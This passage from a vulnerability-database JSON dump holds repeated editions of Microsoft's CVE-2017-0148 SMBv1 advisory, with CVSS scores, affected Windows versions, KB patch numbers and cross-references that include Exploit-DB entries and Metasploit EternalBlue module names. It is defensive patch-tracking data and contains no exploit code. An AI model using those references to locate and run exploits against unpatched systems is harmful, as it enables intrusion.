"KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-17T10:52:46", "differentElements": ["msAffectedSoftware"], "edition": 51}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-17T12:43:31", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-16T12:44:29", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-16T12:44:29", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012213", "KB4012212", "KB3205409", "KB4012214", "KB4012606", "KB4012598", "KB3213986", "KB3205401", "KB4012217", "KB4012215", "KB3210720", "KB3210721", "KBMS16-110, 3187754", "KB4013429", "KB4012216", "KB3212646", "KB3177186", "KB4013198"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-17T12:43:31", "differentElements": ["msAffectedSoftware"], "edition": 52}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "1455b21b7b338994ddec7ae57c94d0af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-17T16:50:29", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-16T12:44:29", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-16T12:44:29", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012213", "KB4012212", "KB3205409", "KB4012214", "KB4012606", "KB4012598", "KB3213986", "KB3205401", "KB4012217", "KB4012215", "KB3210720", "KB3210721", "KBMS16-110, 3187754", "KB4013429", "KB4012216", "KB3212646", "KB3177186", "KB4013198"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-17T16:50:29", "differentElements": ["msAffectedSoftware"], "edition": 53}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-17T18:44:02", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": 